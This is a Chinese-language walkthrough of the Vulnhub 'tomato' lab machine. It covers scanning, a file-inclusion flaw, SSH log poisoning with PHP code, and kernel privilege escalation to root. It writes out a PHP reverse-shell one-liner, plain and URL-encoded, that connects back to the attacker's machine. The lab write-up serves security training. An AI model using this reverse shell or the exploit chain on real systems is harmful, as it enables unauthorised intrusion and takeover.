Vulnhub靶机tomato渗透

542 阅读2分钟

靶机介绍 官方下载地址:www.vulnhub.com/entry/tomat… 该靶机目标是获取root目录下的flag,难度是中等到困难 在这里插入图片描述 运行环境: 靶机:网络连接方式设为自动桥接,IP地址:192.168.1.86 攻击机:通网段下的kali linux,IP地址:192.168.1.44 开始渗透 运行靶机 在这里插入图片描述 获取IP地址 在这里插入图片描述 扫描端口及其服务 在这里插入图片描述 扫描目录 在这里插入图片描述 开始访问 80端口首页是一张图片,源代码也没有获取有用的信息 在这里插入图片描述 server-status是一个目录 antibot_image发现目录遍历漏洞 在这里插入图片描述http://192.168.1.86/antibot_image/antibots/info.php的源代码当中发现了文件包含的命令 在这里插入图片描述 使用文件包含,可以包含成功 在这里插入图片描述 查看ssh服务的日志文件,在日志里面发现tomato用户 在这里插入图片描述 尝试使用php代码作为用户名进行注入 在这里插入图片描述 判断是否注入成功,加入参数执行发现执行成功 在这里插入图片描述 既然php代码可以注入成功,就可以利用php来反弹shell 开启监听,执行下面这条语句,需要进行url编码否则不会被解析 源代码:php+-r+'$sock=fsockopen("192.168.1.44",4444);exec("/bin/sh+-i+<&3+>&3+2>&3");' url编码之后:php+-r+%27%24sock%3dfsockopen(%22192.168.1.44%22%2c4444)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27 在这里插入图片描述 反弹成功,利用python交互,打开终端 在这里插入图片描述 想办法提权, 查了一个系统版本,再使用searchsploit查了一下发现有可利用的漏洞 在这里插入图片描述 在这里插入图片描述 使用44300.c提权失败了,经过百度之后使用github上面的一个脚本 github.com/kkamagui/li… 由于靶机的gcc命令不能使用所以在kali将脚本进行编译,再下载到靶机上面 在这里插入图片描述 将编译好的文件放到临时的http服务上面 在这里插入图片描述 在这里插入图片描述 在这里插入图片描述 下载成功之后赋予文件权限并执行该文件 在这里插入图片描述 在这里插入图片描述 已经提权到root 可能是因为物理机电脑CPU不兼容,虚拟机报错,无法查看flag 靶机到这里已经算完成了 在这里插入图片描述